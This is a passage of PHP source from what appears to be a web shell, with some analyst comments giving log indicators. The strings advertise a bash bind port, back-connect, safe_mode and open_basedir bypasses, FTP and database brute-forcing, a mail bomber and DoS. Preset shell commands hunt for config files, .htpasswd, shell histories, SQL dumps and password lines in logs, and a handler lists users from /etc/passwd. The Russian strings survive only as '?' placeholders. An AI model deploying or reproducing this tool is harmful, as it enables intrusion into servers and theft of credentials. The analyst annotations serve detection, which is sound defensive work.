2345
2346'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2347
2348'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2349
2350'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????(TMPDIR) (PHP <= 5.2.4)',
2351
2352'ru_text134'=>'???????? ??? ??????',
2353
2354'ru_text135'=>'???????',
2355
2356'ru_text136'=>'???????? ?????????? ??????',
2357
2358'ru_text137'=>'????????',
2359
2360'ru_text138'=>'???????',
2361
2362'ru_text139'=>'????-??????',
2363
2364'ru_text140'=>'DoS',
2365
2366'ru_text141'=>'?????????! ???????? ???? ???-???????.',
2367
2368'ru_text142'=>'????????? ???????',
2369
2370'ru_text143'=>'Temp: ',
2371
2372'ru_text144'=>'Test bypass safe_mode with load file in mysqli',
2373
2374'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? realpath() (PHP <= 5.2.4)',
2375
2376'ru_text146'=>'MAX ???-?? ????????',
2377
2378'ru_text147'=>'',
2379
2380'ru_text148'=>'',
2381
2382'ru_text149'=>'',
2383
2384'ru_text150'=>'',
2385
2386'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
2387
2388'ru_err1'=>'??????! ?? ???? ????????? ???? ',
2389
2390'ru_err2'=>'??????! ?? ??????? ??????? ',
2391
2392'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
2393
2394'ru_err4'=>'?????? ??????????? ?? ftp ???????',
2395
2396'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
2397
2398'ru_err6'=>'??????! ?? ??????? ????????? ??????',
2399
2400'ru_err7'=>'?????? ??????????',
2401
2402/* --------------------------------------------------------------- */
2403
// English strings: same ids as the 'ru_*' set above.
2404'eng_butt1' =>'Execute',
2405
2406'eng_butt2' =>'Upload',
2407
2408'eng_butt3' =>'Bind',
2409
2410'eng_butt4' =>'Connect',
2411
2412'eng_butt5' =>'Run',
2413
2414'eng_butt6' =>'Change',
2415
2416'eng_butt7' =>'Show',
2417
2418'eng_butt8' =>'Test',
2419
2420'eng_butt9' =>'Dump',
2421
2422'eng_butt10'=>'Save',
2423
2424'eng_butt11'=>'Edit file',
2425
2426'eng_butt12'=>'Find',
2427
2428'eng_butt13'=>'Create/Delete',
2429
2430'eng_butt14'=>'Download',
2431
2432'eng_butt15'=>'Send',
2433
2434'eng_text1' =>'Executed command',
2435
2436'eng_text2' =>'Execute command on server',
2437
2438'eng_text3' =>'Run command',
2439
2440'eng_text4' =>'Work directory',
2441
2442'eng_text5' =>'Upload files on server',
2443
2444'eng_text6' =>'Local file',
2445
2446'eng_text7' =>'Aliases',
2447
2448'eng_text8' =>'Select alias',
2449
2450'eng_text9' =>'Bind port to /bin/bash',
2451
2452'eng_text10'=>'Port',
2453
2454'eng_text11'=>'Password for access',
2455
2456'eng_text12'=>'back-connect',
2457
2458'eng_text13'=>'IP',
2459
2460'eng_text14'=>'Port',
2461
2462'eng_text15'=>'Upload files from remote server',
2463
2464'eng_text16'=>'With',
2465
2466'eng_text17'=>'Remote file',
2467
2468'eng_text18'=>'Local file',
2469
2470'eng_text19'=>'Exploits',
2471
2472'eng_text20'=>'Use',
2473
2474'eng_text21'=>' New name',
2475
2476'eng_text22'=>'datapipe',
2477
2478'eng_text23'=>'Local port',
2479
2480'eng_text24'=>'Remote host',
2481
2482'eng_text25'=>'Remote port',
2483
2484'eng_text26'=>'Use',
2485
2486'eng_text28'=>'Work in safe_mode',
2487
2488'eng_text29'=>'ACCESS DENIED',
2489
2490'eng_text30'=>'Cat file',
2491
2492'eng_text31'=>'File not found',
2493
2494'eng_text32'=>'Eval PHP code',
2495
2496'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
2497
2498'eng_text34'=>'Test bypass safe_mode with include function',
2499
2500'eng_text35'=>'Test bypass safe_mode with load file in mysql',
2501
2502'eng_text36'=>'Database . Table',
2503
2504'eng_text37'=>'Login',
2505
2506'eng_text38'=>'Password',
2507
2508'eng_text39'=>'Database',
2509
2510'eng_text40'=>'Dump database table',
2511
2512'eng_text41'=>'Save dump in file',
2513
2514'eng_text42'=>'Edit files',
2515
2516'eng_text43'=>'File for edit',
2517
2518'eng_text44'=>'Can\'t edit file! Only read access!',
2519
2520'eng_text45'=>'File saved',
2521
2522'eng_text46'=>'Show phpinfo()',
2523
2524'eng_text47'=>'Show variables from php.ini',
2525
2526'eng_text48'=>'Delete temp files',
2527
2528'eng_text49'=>'Delete script from server',
2529
2530'eng_text50'=>'View cpu info',
2531
2532'eng_text51'=>'View memory info',
2533
2534'eng_text52'=>'Find text',
2535
2536'eng_text53'=>'In dirs',
2537
2538'eng_text54'=>'Find text in files',
2539
2540'eng_text55'=>'Only in files',
2541
2542'eng_text56'=>'Nothing :(',
2543
2544'eng_text57'=>'Create/Delete File/Dir',
2545
2546'eng_text58'=>'name',
2547
2548'eng_text59'=>'file',
2549
2550'eng_text60'=>'dir',
2551
2552'eng_text61'=>'File created',
2553
2554'eng_text62'=>'Dir created',
2555
2556'eng_text63'=>'File deleted',
2557
2558'eng_text64'=>'Dir deleted',
2559
2560'eng_text65'=>'Create',
2561
2562'eng_text66'=>'Delete',
2563
2564'eng_text67'=>'Chown/Chgrp/Chmod',
2565
2566'eng_text68'=>'Command',
2567
2568'eng_text69'=>'param1',
2569
2570'eng_text70'=>'param2',
2571
2572'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2573
2574'eng_text72'=>'Text for find',
2575
2576'eng_text73'=>'Find in folder',
2577
2578'eng_text74'=>'Find in files',
2579
2580'eng_text75'=>'* you can use regexp',
2581
2582'eng_text76'=>'Search text in files via find',
2583
2584'eng_text80'=>'Type',
2585
2586'eng_text81'=>'Net',
2587
2588'eng_text82'=>'Databases',
2589
2590'eng_text83'=>'Run SQL query',
2591
2592'eng_text84'=>'SQL query',
2593
2594'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2595
2596'eng_text86'=>'Download files from server',
2597
2598'eng_text87'=>'Download files from remote ftp-server',
2599
2600'eng_text88'=>'server:port',
2601
2602'eng_text89'=>'File on ftp',
2603
2604'eng_text90'=>'Transfer mode',
2605
2606'eng_text91'=>'Archivation',
2607
2608'eng_text92'=>'without arch.',
2609
2610'eng_text93'=>'FTP',
2611
2612'eng_text94'=>'FTP-bruteforce',
2613
2614'eng_text95'=>'Users list',
2615
2616'eng_text96'=>'Can\'t get users list',
2617
2618'eng_text97'=>'checked: ',
2619
2620'eng_text98'=>'success: ',
2621
2622'eng_text99'=>'/etc/passwd',
2623
2624'eng_text100'=>'Send file to remote ftp server',
2625
2626'eng_text101'=>'Use reverse (user -> resu)',
2627
2628'eng_text102'=>'Mail',
2629
2630'eng_text103'=>'Send email',
2631
2632'eng_text104'=>'Send file to email',
2633
2634'eng_text105'=>'To',
2635
2636'eng_text106'=>'From',
2637
2638'eng_text107'=>'Subj',
2639
2640'eng_text108'=>'Mail',
2641
2642'eng_text109'=>'Hide',
2643
2644'eng_text110'=>'Show',
2645
2646'eng_text111'=>'SQL-Server : Port',
2647
2648'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2649
2650'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
2651
2652'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
2653
2654'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
2655
2656'eng_text116'=>'Copy from',
2657
2658'eng_text117'=>'to',
2659
2660'eng_text118'=>'File copied',
2661
2662'eng_text119'=>'Cant copy file',
2663
2664'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
2665
2666'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
2667
2668'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
2669
2670'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
2671
2672'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2673
2674'eng_text125'=>'Data',
2675
2676'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
2677
2678'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2679
2680'eng_text128'=>'Modify/Access file (touch)',
2681
2682'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
2683
2684'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
2685
2686'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
2687
2688'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
2689
2690'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
2691
2692'eng_text134'=>'Database-bruteforce',
2693
2694'eng_text135'=>'Dictionary',
2695
2696'eng_text136'=>'Creating evil symlink',
2697
2698'eng_text137'=>'Useful',
2699
2700'eng_text138'=>'Dangerous',
2701
2702'eng_text139'=>'Mail Bomber',
2703
2704'eng_text140'=>'DoS',
2705
2706'eng_text141'=>'Danger! Web-daemon crash possible.',
2707
2708'eng_text142'=>'Downloaders',
2709
2710'eng_text143'=>'Temp: ',
2711
2712'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
2713
2714'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
2715
2716'eng_text146'=>'Max Interation',
2717
2718'eng_text147'=>'',
2719
2720'eng_text148'=>'',
2721
2722'eng_text149'=>'',
2723
2724'eng_text150'=>'',
2725
2726'eng_err0'=>'Error! Can\'t write in file ',
2727
2728'eng_err1'=>'Error! Can\'t read file ',
2729
2730'eng_err2'=>'Error! Can\'t create ',
2731
2732'eng_err3'=>'Error! Can\'t connect to ftp',
2733
2734'eng_err4'=>'Error! Can\'t login on ftp server',
2735
2736'eng_err5'=>'Error! Can\'t change dir on ftp',
2737
2738'eng_err6'=>'Error! Can\'t sent mail',
2739
2740'eng_err7'=>'Mail send',
2741
2742);
2743
/*
Command aliases: preset shell command lines, keyed by the caption under which each one is listed.
(The original Russian comment is unreadable in this copy; only '?' placeholders survive, presumably after a character-set conversion.)
*/
2753
2754$aliases=array(
2755
2756'----------------------------------locate'=>'',
2757
2758'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2759
2760'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2761
2762'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2763
2764'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2765
2766'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2767
2768'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2769
2770'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2771
2772'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2773
2774'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2775
2776'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2777
2778'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2779
2780'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2781
2782'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2783
2784'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2785
2786'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2787
2788'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2789
2790'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2791
2792'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2793
2794'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2795
2796'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2797
2798'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2799
2800'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2801
2802'----------------------------------tar'=>'',
2803
2804'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt',
2805
2806'----------------------------------1'=>'',
2807
2808'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2809
2810'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2811
2812'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2813
2814'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2815
2816'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2817
2818'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2819
2820'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2821
2822'----------------------------------2'=>'',
2823
2824'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2825
2826'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2827
2828'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2829
2830'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2831
2832'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2833
2834'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2835
2836'----------------------------------find'=>'',
2837
2838'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2839
2840'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2841
2842'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2843
2844'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2845
2846'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2847
2848'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2849
2850'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2851
2852'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2853
2854'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2855
2856'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2857
2858'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2859
2860'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2861
2862'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2863
2864'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2865
2866'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2867
2868'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2869
2870'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2871
2872'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2873
2874'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2875
2876'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2877
2878'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2879
2880'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2881
2882'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2883
2884'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2885
2886'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2887
2888'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2889
2890'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2891
2892'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2893
2894'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2895
2896'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2897
2898'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2899
2900'-----------------------------------'=>'',
2901
2902'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2903
2904'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2905
2906'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2907
2908'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2909
2910'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2911
2912'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2913
2914'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2915
2916'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2917
2918'----------------------------------------------------------------------------------------------------'=>'ls -la'
2919
2920);
2921
// Static HTML fragments kept in global variables. Nothing in this part of the
// file shows where they are concatenated; the values are plain markup with no
// interpolation, so single-quoted literals are equivalent.
$table_up1  = '<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ';
$table_up2  = ' ::</div></b></font></td></tr><tr><td>';
$table_up3  = '<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>';
$table_end1 = '</td></tr>';

// Small decorations: arrow glyph (Webdings "4") and square brackets.
$arrow = ' <font face=Webdings color=gray>4</font>';
$lb    = '<font color=black>[</font>';
$rb    = '<font color=black>]</font>';
$font  = '<font face=Verdana size=-2>';

// Table and form wrappers. The form posts back to the same URL (no action attribute).
$ts = '<table class=table1 width=100% align=center>';
$te = '</table>';
$fs = '<form name=form method=POST>';
$fe = '</form>';
2945
2946
2947
// Request handler: when the query string carries a `users` parameter, the
// script prints the first field of every line of /etc/passwd (one name per
// line, via get_users()) and terminates.
// Analyst note: this is local-account enumeration performed by the web
// server's PHP process. The trigger is a GET parameter, so it shows up in
// access logs as `?users` on the script's URL; reads of /etc/passwd by the
// PHP worker are a second signal where file-access auditing is enabled.
if(isset($_GET['users']))
 {
 // get_users() returns 0 when the file could not be read; the error text is
 // taken from $lang, which is defined outside this part of the file.
 if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
 else
 {
 echo '<center>';
 // Names are echoed as-is, without HTML escaping.
 foreach($users as $user) { echo $user."<br>"; }
 echo '</center>';
 }
 // PHP_SELF is written into the link unescaped; the script stops here.
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
 }
2969
2970
2971
// Working-directory and platform detection.
// The POST field `dir` is used unvalidated: the process changes into it with
// chdir(), or calls chroot() when chdir() is unavailable.
if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
// $dir is the posted value, else the current working directory. It is left
// unassigned here when no `dir` was posted and chdir() does not exist.
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
$unix = 0;
// Heuristic: a colon in the second character ("C:...") means Windows, anything else Unix.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// With no directory known, fall back to the OS environment variable, then php_uname().
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = @php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
 {
 // eregi() was removed in PHP 7.0, which dates this code to PHP 4/5.
 if(@eregi("^win",$os)) { $unix = 0; }
 else { $unix = 1; }
 }
 }
3001
3002
3003
// Request handler for POST cmd=search_text: searches the files under s_dir
// for the words in s_text (optionally limited to the extensions in s_mask
// when `m` is also set), prints the matching lines as an HTML table and exits.
// Analyst note: this gives the requester a recursive content search over any
// directory the PHP process can read. The POST fields s_dir / s_text / s_mask
// together with cmd=search_text are a request-body indicator for WAF or
// proxy logging that records POST parameters.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
 {
 // $head is defined outside this part of the file.
 echo $head;
 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
 // phrase=0, case=0: no word-boundary anchors, case-insensitive.
 $sr->SearchText(0,0);
 $res = $sr->GetResultFiles();
 $found = $sr->GetMatchesCount();
 $titles = $sr->GetTitles();
 $r = "";
 if($found > 0)
 {
 $r .= "<TABLE width=100%>";
 // $res maps file path => (line number => matching line with highlight markup).
 foreach($res as $file=>$v)
 {
 $r .= "<TR>";
 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
 // Paths are shown with backslashes when the platform flag says Windows.
 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
